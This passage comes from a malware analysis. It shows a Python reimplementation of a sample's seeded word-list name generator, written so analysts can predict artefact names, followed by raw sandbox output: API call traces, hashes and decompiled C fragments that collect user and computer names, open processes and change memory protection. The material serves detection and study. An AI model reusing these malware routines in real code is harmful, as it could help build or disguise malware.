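    for line in buf.replace(b"\r", b"\n").split(b"\n"):
        if not line:
            continue
        if len(words) == cap:
            break
        c = line[0]
        if 0 <= c - 0x61 <= 0x19:          # 'a'..'z'
            line = bytes([c - 0x20]) + line[1:]
        words.append(line)
    return words


def generate_names(seed, words, count=None, max_attempts=100000):
    """Return (names, final_state). Each name is words[s1 % n] + words[s2 % n]
    where s1 and s2 are consecutive LCG outputs (lstrcpy then lstrcat in the
    sample). The sample loops once per word (do/while over _a8), so count
    defaults to n. It sizes its output buffer at (2*maxlen + 5) bytes per name."""
    n = len(words)
    if n <= 0x20:                           # sample fails with ERROR_BAD_FORMAT (0xB)
        raise ValueError("word list must contain more than 32 entries")
    if count is None:
        count = n
    state = seed & MASK
    names = []
    seen = set()
    attempts = 0
    while len(names) < count:
        attempts += 1
        if attempts > max_attempts:
            raise RuntimeError("could not produce enough distinct names")
        s1 = lcg_step(state)
        state = lcg_step(s1)
        name = words[s1 % n] + words[state % n]   # lstrcpy + lstrcat
        if name in seen:                          # lstrcmp hit: assumed retry
            continue
        seen.add(name)
        names.append(name)
    return names, state


# Constructed sample input (not from the report): 40 CR/LF-separated words.
SAMPLE_WORDLIST = b"\r\n".join(b"word%d" % i for i in range(40))

if __name__ == "__main__":
    ws = parse_wordlist(SAMPLE_WORDLIST)
    out, _ = generate_names(seed=0x1234, words=ws, count=5)
    for name in out:
        print(name.decode())
```

Feeding the routine the same seed and word list yields the same sequence of names, which is what makes this generator useful for an analyst: once the seed source and the word list embedded in a given build are known, the artefact names a sample will create can be enumerated ahead of time.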

                              APIs
                              • lstrlenW.KERNEL32(?,-053F010C,00000000,053E89BB), ref: 053C7FEB
                              • lstrlenW.KERNEL32(?,-053F010C,00000000,053E89BB), ref: 053C7FFC
                              • lstrlenW.KERNEL32(?,-053F010C,00000000,053E89BB), ref: 053C800E
                              • lstrlenW.KERNEL32(?,-053F010C,00000000,053E89BB), ref: 053C8020
                              • lstrlenW.KERNEL32(?,-053F010C,00000000,053E89BB), ref: 053C8032
                              • lstrlenW.KERNEL32(?,-053F010C,00000000,053E89BB), ref: 053C803E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen
                              • String ID:
                              • API String ID: 1659193697-0
                              • Opcode ID: 660e00084b17582a35aaadaaa4cb925e33696d8755f36772b2be3d65a76af000
                              • Instruction ID: 73f1726a2cf9e77d3e2190c6fd49b64f026e9c52ba43a2fc5de676748eb1f843
                              • Opcode Fuzzy Hash: 660e00084b17582a35aaadaaa4cb925e33696d8755f36772b2be3d65a76af000
                              • Instruction Fuzzy Hash: 92412171E00219AFCB24DFA9C884A6EFBFAFF84204F14846DE555E7200E775EE058B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053E3C8A: RtlEnterCriticalSection.NTDLL(053F0488), ref: 053E3C92
                                • Part of subcall function 053E3C8A: RtlLeaveCriticalSection.NTDLL(053F0488), ref: 053E3CA7
                                • Part of subcall function 053E3C8A: InterlockedIncrement.KERNEL32(0000001C), ref: 053E3CC0
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 053CA661
                              • memcpy.NTDLL(00000000,?,?), ref: 053CA672
                              • lstrcmpi.KERNEL32(00000002,?), ref: 053CA6B8
                              • memcpy.NTDLL(00000000,?,?), ref: 053CA6CC
                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 053CA712
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                              • String ID:
                              • API String ID: 733514052-0
                              • Opcode ID: 2afa14c7c40947caaf8b7499db6bd91208bcee3458d09548007decc85f0ec7a5
                              • Instruction ID: 16069eabbeebaca8979cc6b260bff8fbf028bea21d590a464bc9e31f0446ab7e
                              • Opcode Fuzzy Hash: 2afa14c7c40947caaf8b7499db6bd91208bcee3458d09548007decc85f0ec7a5
                              • Instruction Fuzzy Hash: 53317C76A10219AFDB119FE8DC89AAE7FB9FB04314F14406DF906E7240EB719D548BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053CC05C: lstrlen.KERNEL32(00000000,00000000,?,00000000,053CBDA2,00000000,00000000,00000000,00000000), ref: 053CC068
                              • RtlEnterCriticalSection.NTDLL(053F0488), ref: 053CBDB8
                              • RtlLeaveCriticalSection.NTDLL(053F0488), ref: 053CBDCB
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 053CBDDC
                              • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 053CBE47
                              • InterlockedIncrement.KERNEL32(053F049C), ref: 053CBE5E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                              • String ID:
                              • API String ID: 3915436794-0
                              • Opcode ID: adfa24cac0715bb8e77741064128682a6ba6d9f65ca3dda769d517020d802d09
                              • Instruction ID: 856c80ca5c163db63e27bbfb227cd3ea1fc6ca56dc29864bdff6245eae7ccff7
                              • Opcode Fuzzy Hash: adfa24cac0715bb8e77741064128682a6ba6d9f65ca3dda769d517020d802d09
                              • Instruction Fuzzy Hash: 1F31AA31A142069BCB25CF28D85A92AFBF8FB45720F40495DF99A87251CB30DC21CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNEL32(?,?,00000000,00000000,053C8E67,00000000,747DF5B0,053C5001,?,00000001,?,00000000), ref: 053DA7C3
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053DA7D8
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053DA7F4
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DA809
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DA81D
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad$AddressProc
                              • String ID:
                              • API String ID: 1469910268-0
                              • Opcode ID: 5806f222b29f0b1a0ee0755952d1f66cdd67a6ba1054580d901c874128282da9
                              • Instruction ID: 8c8cfb3ed070cc97263dad53fe0b38ed63907a0d85e3c2cad255fcaf304cad99
                              • Opcode Fuzzy Hash: 5806f222b29f0b1a0ee0755952d1f66cdd67a6ba1054580d901c874128282da9
                              • Instruction Fuzzy Hash: BC318B766602049FC716CB5CE88AA597BFDFB09310F00001AF51ADF391DBB0E942CB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D8941() {
                              				long _v8;
                              				long _v12;
                              				int _v16;
                              				long _t39;
                              				long _t43;
                              				signed int _t47;
                              				signed int _t52;
                              				int _t56;
                              				int _t57;
                              				char* _t63;
                              				short* _t66;
                              
                              				_v16 = 0;
                              				_v8 = 0;
                              				GetUserNameW(0,  &_v8);
                              				_t39 = _v8;
                              				if(_t39 != 0) {
                              					_v12 = _t39;
                              					_v8 = 0;
                              					GetComputerNameW(0,  &_v8);
                              					_t43 = _v8;
                              					if(_t43 != 0) {
                              						_t11 = _t43 + 2; // 0x74785522
                              						_v12 = _v12 + _t11;
                              						_t63 = E049D55DC(_v12 + _t11 << 2);
                              						if(_t63 != 0) {
                              							_t47 = _v12;
                              							_t66 = _t63 + _t47 * 2;
                              							_v8 = _t47;
                              							if(GetUserNameW(_t66,  &_v8) == 0) {
                              								L7:
                              								E049D6DFA(_t63);
                              							} else {
                              								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                              								_t52 = _v8;
                              								_v12 = _v12 - _t52;
                              								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                              									goto L7;
                              								} else {
                              									_t56 = _v12 + _v8;
                              									_t31 = _t56 + 2; // 0x49d642f
                              									_v12 = _t56;
                              									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
                              									_v8 = _t57;
                              									if(_t57 == 0) {
                              										goto L7;
                              									} else {
                              										_t63[_t57] = 0;
                              										_v16 = _t63;
                              									}
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _v16;
                              			}
                              APIs
                              • GetUserNameW.ADVAPI32(00000000,049D642D), ref: 049D8955
                              • GetComputerNameW.KERNEL32(00000000,049D642D), ref: 049D8971
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • GetUserNameW.ADVAPI32(00000000,049D642D), ref: 049D89AB
                              • GetComputerNameW.KERNEL32(049D642D,74785520), ref: 049D89CD
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,049D642D,00000000,049D642F,00000000,00000000,?,74785520,049D642D), ref: 049D89F0
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                              • String ID:
                              • API String ID: 3850880919-0
                              • Opcode ID: 2c990c7955c414df2ceefded344fb04ce44b777f510cc1fa2b5bacfca52454ad
                              • Instruction ID: c0e8e5924d9abbebd625370db115b93ab86eb61bcae68734cef20cb9b7c2eb9f
                              • Opcode Fuzzy Hash: 2c990c7955c414df2ceefded344fb04ce44b777f510cc1fa2b5bacfca52454ad
                              • Instruction Fuzzy Hash: B7210876900148FFDB11DFA8C9848EEBBBCEE44344B5184BAE505E7201DB34AF44DB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD62B
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD644
                                • Part of subcall function 053DD619: GetCurrentThreadId.KERNEL32 ref: 053DD651
                                • Part of subcall function 053DD619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053DD65D
                                • Part of subcall function 053DD619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD66B
                                • Part of subcall function 053DD619: lstrcpy.KERNEL32(00000000), ref: 053DD68D
                              • DeleteFileA.KERNEL32(00000000,000004D2), ref: 053DFFA0
                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 053DFFA9
                              • GetLastError.KERNEL32 ref: 053DFFB3
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053E0072
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 3543646443-0
                              • Opcode ID: f4d68341a322818275c00119f165e51c46b16e150c6a64613e1d8d3fc82c2e05
                              • Instruction ID: 644f983dffe886cfa844ad458bf7680e4bbdec68df9d4f048b6e1aeb48d98c6d
                              • Opcode Fuzzy Hash: f4d68341a322818275c00119f165e51c46b16e150c6a64613e1d8d3fc82c2e05
                              • Instruction Fuzzy Hash: A9215C72651624BBC610EBA4FC8DDAB3BECAB4A321F040611B616CB1D1EAB4E504C7B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrChrA.SHLWAPI(?,0000002C), ref: 053DC485
                              • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 053DC49E
                              • StrTrimA.SHLWAPI(?,?), ref: 053DC4C6
                              • StrTrimA.SHLWAPI(00000000,?), ref: 053DC4D5
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 053DC50C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Trim$FreeHeap
                              • String ID:
                              • API String ID: 2132463267-0
                              • Opcode ID: d976dc75eef7b0983817b71f29161c7b58e06a781db7b15068f9553f33c5aed9
                              • Instruction ID: 8bb09f46f77592357327768598174310e8819d4d8f65e9d727286270fa862b06
                              • Opcode Fuzzy Hash: d976dc75eef7b0983817b71f29161c7b58e06a781db7b15068f9553f33c5aed9
                              • Instruction Fuzzy Hash: 9611547722021ABBD7229B59DC8DFABBFBDFB44794F101021BA06DB181DAA0DD00D760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(053E4E4B,?,?,?,?,00000008,053E4E4B,00000000,?), ref: 053E4F1C
                              • memcpy.NTDLL(053E4E4B,?,00000009,?,?,?,?,00000008,053E4E4B,00000000,?), ref: 053E4F3E
                              • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 053E4F56
                              • lstrlenW.KERNEL32(00000000,00000001,053E4E4B,?,?,?,?,?,?,?,00000008,053E4E4B,00000000,?), ref: 053E4F76
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,053E4E4B,00000000,?), ref: 053E4F9B
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                              • String ID:
                              • API String ID: 3065863707-0
                              • Opcode ID: cb2c3d402ea6baffdab6847f56d970fffd0c37ee92391510ce7f28c676c36f8d
                              • Instruction ID: 344da98a53242422c9eaf0ee587b0c0ca79aae3581223eaf9fbe37de97a55b4a
                              • Opcode Fuzzy Hash: cb2c3d402ea6baffdab6847f56d970fffd0c37ee92391510ce7f28c676c36f8d
                              • Instruction Fuzzy Hash: 5D116076E10208BBDF219BA5D84EF8E7FBDAB48710F008055F905EA281EA74D609CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrcmpi.KERNEL32(00000000,?), ref: 053D4708
                              • RtlEnterCriticalSection.NTDLL(053F0488), ref: 053D4715
                              • RtlLeaveCriticalSection.NTDLL(053F0488), ref: 053D4728
                              • lstrcmpi.KERNEL32(053F04A0,00000000), ref: 053D4748
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053C2A18,00000000), ref: 053D475C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                              • String ID:
                              • API String ID: 1266740956-0
                              • Opcode ID: d8d05771eca3ecf775eb25e82c6dba0dcb47f8e1aa719166d03a19959a275737
                              • Instruction ID: bf03b6a31ce9f29e13d3710e7f6aa8a95278c18c3e93a4337affc8344d0d57a3
                              • Opcode Fuzzy Hash: d8d05771eca3ecf775eb25e82c6dba0dcb47f8e1aa719166d03a19959a275737
                              • Instruction Fuzzy Hash: F8119D32910205AFCB48CF5CD88EA9ABBFCFB45324F454119F55ADB281D7B4AD148FA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053CC05C: lstrlen.KERNEL32(00000000,00000000,?,00000000,053CBDA2,00000000,00000000,00000000,00000000), ref: 053CC068
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 053CF582
                              • memcpy.NTDLL(00000000,?,?), ref: 053CF595
                              • RtlEnterCriticalSection.NTDLL(053F0488), ref: 053CF5A6
                              • RtlLeaveCriticalSection.NTDLL(053F0488), ref: 053CF5BB
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 053CF5F3
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                              • String ID:
                              • API String ID: 2349942465-0
                              • Opcode ID: 27cc727df00acd52f2ef585bb26ad615401e705dba67428c70a9d15da0172142
                              • Instruction ID: f19180faa144959ccb7934fe89330c0ec953ef37d34ba474f9397e4f362b197e
                              • Opcode Fuzzy Hash: 27cc727df00acd52f2ef585bb26ad615401e705dba67428c70a9d15da0172142
                              • Instruction Fuzzy Hash: 5D11E076215211AFC3255E189C8DC2B7FADEB85325F01056EFA469B241CA315C148BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,00000000,?,?,?,053C4811,?,?,00000000), ref: 053C8728
                              • lstrlen.KERNEL32(?,?,?,?,053C4811,?,?,00000000), ref: 053C872F
                              • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 053C873D
                                • Part of subcall function 053C6BCF: GetLocalTime.KERNEL32(?,?,053DA620,00000000,00000001), ref: 053C6BD9
                                • Part of subcall function 053C6BCF: wsprintfA.USER32 ref: 053C6C0C
                              • wsprintfA.USER32 ref: 053C875F
                                • Part of subcall function 053CA182: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,053C8787,00000000,?,00000000,00000000,00000006,00000000), ref: 053CA1A0
                                • Part of subcall function 053CA182: wsprintfA.USER32 ref: 053CA1C5
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,00000000), ref: 053C8790
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                              • String ID:
                              • API String ID: 3847261958-0
                              • Opcode ID: de8beca27f05050a64f26a55b36a268a560ed5ce5ea502d9ca32db48454e5db8
                              • Instruction ID: 18cb1997d20787e95c17887a6f6fd46c9b6c1b89e6e3dd7fac6114747182e237
                              • Opcode Fuzzy Hash: de8beca27f05050a64f26a55b36a268a560ed5ce5ea502d9ca32db48454e5db8
                              • Instruction Fuzzy Hash: 0C01D676100218BFCB222F29DC4DD9B7F6EFF80364F008025FD099A251EA328E11CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D34A4: lstrlen.KERNEL32(053CEFEF,747DF560,00000000,?,00000000,053DBF21,?,00000000,?,?,053CEFEF,00000020), ref: 053D34B3
                                • Part of subcall function 053D34A4: mbstowcs.NTDLL ref: 053D34CF
                              • lstrlenW.KERNEL32(00000000,747DF560,00000000,?,00000000,?,?,053CEFEF,00000020), ref: 053DBF30
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053DBF42
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,053CEFEF,00000020), ref: 053DBF5F
                              • lstrlenW.KERNEL32(00000000,?,?,053CEFEF,00000020), ref: 053DBF6B
                              • HeapFree.KERNEL32(00000000,00000000,?,?,053CEFEF,00000020), ref: 053DBF7F
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                              • String ID:
                              • API String ID: 3403466626-0
                              • Opcode ID: 0a66f9715a737e348a559133d9ff2a7f652d480088bd170b5b294dfa45f4fa17
                              • Instruction ID: 1c2e22dee415415b8b80b969820a094a5910514ffda532b1a7871dab9bb3e87d
                              • Opcode Fuzzy Hash: 0a66f9715a737e348a559133d9ff2a7f652d480088bd170b5b294dfa45f4fa17
                              • Instruction Fuzzy Hash: 2B016976110208EFC7229B98EC8AF9ABBFCEB49314F014021F5069F291CBB09D04CB71
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleA.KERNEL32(?,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C54D7
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053C54F0
                              • OpenProcess.KERNEL32(00000400,00000000,053D3B88,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C550D
                              • IsWow64Process.KERNEL32(00000000,00000000,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C551E
                              • CloseHandle.KERNEL32(00000000,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C5531
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HandleProcess$AddressCloseModuleOpenProcWow64
                              • String ID:
                              • API String ID: 4157061983-0
                              • Opcode ID: 641e1ecf3e167838426e358a5358ee9754d58e5f77be2989e6011f66d06e7b07
                              • Instruction ID: f68d146f6c92d4fcddc5babf399a16a1e513c60cd1e8b5f7944d25e3e5a8002f
                              • Opcode Fuzzy Hash: 641e1ecf3e167838426e358a5358ee9754d58e5f77be2989e6011f66d06e7b07
                              • Instruction Fuzzy Hash: 8A015B75810108EF8B21DF69EC4D8AE7FADFB85351F20415AF507DB141EA71AA01CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleA.KERNEL32 ref: 053D3CF3
                              • GetModuleHandleA.KERNEL32 ref: 053D3D01
                              • LoadLibraryExW.KERNEL32(?,?,?), ref: 053D3D0E
                              • GetModuleHandleA.KERNEL32 ref: 053D3D25
                              • GetModuleHandleA.KERNEL32 ref: 053D3D31
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HandleModule$LibraryLoad
                              • String ID:
                              • API String ID: 1178273743-0
                              • Opcode ID: d41e17ec773ce4488c82726acae0c5ad227081c886ac53f0cf8f6e6a3f632348
                              • Instruction ID: ba9e715f9eeffb474a45b06500532c8a1f6def9d3d4578b8c9e4032e744412ac
                              • Opcode Fuzzy Hash: d41e17ec773ce4488c82726acae0c5ad227081c886ac53f0cf8f6e6a3f632348
                              • Instruction Fuzzy Hash: 3F01A23171424A9F9B115F69EC0196ABFFEFF45360B040435F914CA1A0DFB1CC218EA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,053E784E), ref: 053DF56E
                              • StrTrimA.SHLWAPI(00000001,?,?,053E784E), ref: 053DF591
                              • StrTrimA.SHLWAPI(00000000,?,?,053E784E), ref: 053DF5A0
                              • _strupr.NTDLL ref: 053DF5A3
                              • lstrlen.KERNEL32(00000000,053E784E), ref: 053DF5AB
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Trim$_struprlstrlen
                              • String ID:
                              • API String ID: 2280331511-0
                              • Opcode ID: 03357a6f90e35ef719a2e03e97c6d90825ab9c7a7492492370ac4832c56fd2b1
                              • Instruction ID: afa6e4914ee0cf7a38ebcf51ca25363d21be9124db19d4aa83b89297d8cae612
                              • Opcode Fuzzy Hash: 03357a6f90e35ef719a2e03e97c6d90825ab9c7a7492492370ac4832c56fd2b1
                              • Instruction Fuzzy Hash: 3BF08732220105AFE7199B28EC8EE3A6BACEB49710F100109F802CF280DEA0AD0187A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(053F0460), ref: 053DE6AD
                              • RtlLeaveCriticalSection.NTDLL(053F0460), ref: 053DE6BE
                              • VirtualProtect.KERNEL32(00000001,00000004,00000040,0000007F,?,?,053D21BF,00000000,053F01F4,053F0488,053C5BD7,00000003,?,?,053D738E,00000000), ref: 053DE6D5
                              • VirtualProtect.KERNEL32(00000001,00000004,0000007F,0000007F,?,?,053D21BF,00000000,053F01F4,053F0488,053C5BD7,00000003,?,?,053D738E,00000000), ref: 053DE6EF
                              • GetLastError.KERNEL32(?,?,053D21BF,00000000,053F01F4,053F0488,053C5BD7,00000003,?,?,053D738E,00000000,?,053F01F4), ref: 053DE6FC
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                              • String ID:
                              • API String ID: 653387826-0
                              • Opcode ID: 9bc31fc5874882ba3bd2c2d9b9636448d6af6ecca52b6d1e01b297e134c28f86
                              • Instruction ID: 6d2ea948b742ce953cdbb68ff5b1927f24bed8fdd063ad44db412167bbdf65d0
                              • Opcode Fuzzy Hash: 9bc31fc5874882ba3bd2c2d9b9636448d6af6ecca52b6d1e01b297e134c28f86
                              • Instruction Fuzzy Hash: 08018F76200304AFD7219F18DC09D6ABBFDEF84320B114518FA469B290DB70ED019F24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D2CBF(intOrPtr _a4) {
                              				void* _t2;
                              				long _t4;
                              				void* _t5;
                              				long _t6;
                              				void* _t7;
                              				void* _t13;
                              
                              				_t2 = CreateEventA(0, 1, 0, 0);
                              				 *0x49dd2a4 = _t2;
                              				if(_t2 == 0) {
                              					return GetLastError();
                              				}
                              				_t4 = GetVersion();
                              				if(_t4 != 5) {
                              					L4:
                              					if(_t13 <= 0) {
                              						_t5 = 0x32;
                              						return _t5;
                              					}
                              					L5:
                              					 *0x49dd294 = _t4;
                              					_t6 = GetCurrentProcessId();
                              					 *0x49dd290 = _t6;
                              					 *0x49dd29c = _a4;
                              					_t7 = OpenProcess(0x10047a, 0, _t6);
                              					 *0x49dd28c = _t7;
                              					if(_t7 == 0) {
                              						 *0x49dd28c =  *0x49dd28c | 0xffffffff;
                              					}
                              					return 0;
                              				}
                              				if(_t4 > 0) {
                              					goto L5;
                              				}
                              				_t13 = _t4 - _t4;
                              				goto L4;
                              			}


                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,049D233B,?), ref: 049D2CC7
                              • GetVersion.KERNEL32 ref: 049D2CD6
                              • GetCurrentProcessId.KERNEL32 ref: 049D2CED
                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 049D2D0A
                              • GetLastError.KERNEL32 ref: 049D2D29
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                              • String ID:
                              • API String ID: 2270775618-0
                              • Opcode ID: c10ea4f6580f341f96c1253441d42e0094e37e44a53a5f22a0ae098cfe4c70a7
                              • Instruction ID: 3640bba56a48b979cd2951cb58a1f4887650b4fe399c0cf934520468c2ed432c
                              • Opcode Fuzzy Hash: c10ea4f6580f341f96c1253441d42e0094e37e44a53a5f22a0ae098cfe4c70a7
                              • Instruction Fuzzy Hash: E7F04F7068A305DEEB608F34ED097253F69EB04751F108676E646CB1C4D3789881DF24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InterlockedDecrement.KERNEL32(0000001C), ref: 053CB77C
                              • HeapFree.KERNEL32(00000000,?,77E34620,?,?,053E29F2,00000000), ref: 053CB797
                              • HeapFree.KERNEL32(00000000,00000000,?,?,053E29F2,00000000), ref: 053CB7A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FreeHeap$DecrementInterlocked
                              • String ID: t
                              • API String ID: 2942576174-2238339752
                              • Opcode ID: 831fde956b98a8a6311446d6628d15b2d9647b208f237ecc351a515a5a823f7c
                              • Instruction ID: 8ad69048b7f7a7e3329f57ee566da0ba7df0a7da01227352dc70465ab0b1e8fa
                              • Opcode Fuzzy Hash: 831fde956b98a8a6311446d6628d15b2d9647b208f237ecc351a515a5a823f7c
                              • Instruction Fuzzy Hash: 89D05E71610215BBDBA21F61EC0EE127F7EFB40364F000021F608DA160EB22AC61CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E049D52A1(intOrPtr* __eax) {
                              				void* _v8;
                              				WCHAR* _v12;
                              				void* _v16;
                              				char _v20;
                              				void* _v24;
                              				intOrPtr _v28;
                              				void* _v32;
                              				intOrPtr _v40;
                              				short _v48;
                              				intOrPtr _v56;
                              				short _v64;
                              				intOrPtr* _t54;
                              				intOrPtr* _t56;
                              				intOrPtr _t57;
                              				intOrPtr* _t58;
                              				intOrPtr* _t60;
                              				void* _t61;
                              				intOrPtr* _t63;
                              				intOrPtr* _t65;
                              				intOrPtr* _t67;
                              				intOrPtr* _t69;
